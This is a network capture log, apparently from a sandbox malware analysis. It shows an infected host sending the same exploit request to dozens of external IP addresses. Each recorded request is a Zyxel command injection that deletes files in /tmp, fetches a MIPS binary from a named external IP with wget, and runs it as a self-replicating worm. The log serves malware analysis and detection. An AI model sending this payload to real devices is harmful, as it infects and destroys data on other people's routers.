                              Mar 31, 2024 08:41:09.571742058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1457192.168.2.1346318148.3.159.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571799040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1458192.168.2.1358626122.129.89.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571861982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1459192.168.2.1338044189.187.211.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571916103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1460192.168.2.1347372109.197.139.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.571968079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1461192.168.2.1334344220.176.255.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572031021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1462192.168.2.1358382157.177.58.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572067022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1463192.168.2.1341478208.132.74.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572141886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1464192.168.2.135224260.241.92.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572194099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1465192.168.2.133898831.36.14.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572242975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1466192.168.2.1337006191.179.174.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572278976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1467192.168.2.135644438.55.252.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572335005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1468192.168.2.134196690.32.97.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572390079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1469192.168.2.135462283.173.50.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572443962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1470192.168.2.134133831.22.105.4443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572485924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1471192.168.2.1335982124.151.38.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572544098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1472192.168.2.135231870.63.88.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572598934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1473192.168.2.1341696200.240.230.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572653055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1474192.168.2.1341054132.119.95.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572726965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1475192.168.2.1349896132.245.53.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572765112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1476192.168.2.135364691.94.236.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572824955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1477192.168.2.1335972177.214.159.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572882891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1478192.168.2.1354030115.12.99.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572927952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1479192.168.2.133539831.57.254.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.572993040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1480192.168.2.1358458202.229.230.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573064089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1481192.168.2.1359012155.77.224.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573086977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1482192.168.2.135411023.107.214.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573156118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1483192.168.2.1336764153.82.23.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573209047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1484192.168.2.1354044108.116.248.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573266983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1485192.168.2.1358934118.253.121.157443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573309898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1486192.168.2.135672434.165.228.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573355913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1487192.168.2.1335406188.32.54.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573419094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1488192.168.2.1338048156.82.201.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573468924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1489192.168.2.1347176173.153.251.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573524952 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1490192.168.2.1345718166.18.127.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573570013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1491192.168.2.1335702137.128.152.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573597908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1492192.168.2.1346616177.82.215.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573649883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1493192.168.2.135977488.245.238.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573683023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1494192.168.2.1359964162.5.169.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573757887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1495192.168.2.1350574150.150.10.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573777914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1496192.168.2.134001625.206.225.68443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573858023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1497192.168.2.134429224.197.132.228443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573908091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1498192.168.2.1333592151.79.13.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.573966026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1499192.168.2.1352896123.68.62.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574012041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1500192.168.2.1351890178.247.17.173443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574032068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1501192.168.2.1355800109.53.188.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574110985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1502192.168.2.134923836.175.98.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574116945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1503192.168.2.1343730112.139.51.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574167013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1504192.168.2.1347660223.191.141.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574202061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1505192.168.2.1351616190.18.116.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574239016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1506192.168.2.1342238115.28.103.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574290037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1507192.168.2.134543237.47.111.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574357033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1508192.168.2.1333782152.99.74.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574403048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1509192.168.2.1352408116.97.105.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574460983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1510192.168.2.1343038209.115.24.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574506044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1511192.168.2.1360970141.27.102.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574562073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1512192.168.2.1337550100.18.50.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574614048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1513192.168.2.134924477.244.170.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574673891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1514192.168.2.1336812205.3.42.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574750900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1515192.168.2.133746062.179.142.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574784040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1516192.168.2.1345504125.166.224.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574848890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1517192.168.2.1349234115.15.169.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574886084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1518192.168.2.1349910165.247.240.224443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574935913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1519192.168.2.1360576174.53.15.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.574987888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1520192.168.2.135558876.108.186.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575033903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1521192.168.2.135544670.219.123.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575103045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1522192.168.2.134727464.107.148.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575150967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1523192.168.2.1351544154.36.188.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575197935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1524192.168.2.135419895.171.85.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:09.575257063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1525192.168.2.135086268.16.235.234443
                              TimestampBytes transferredDirectionData
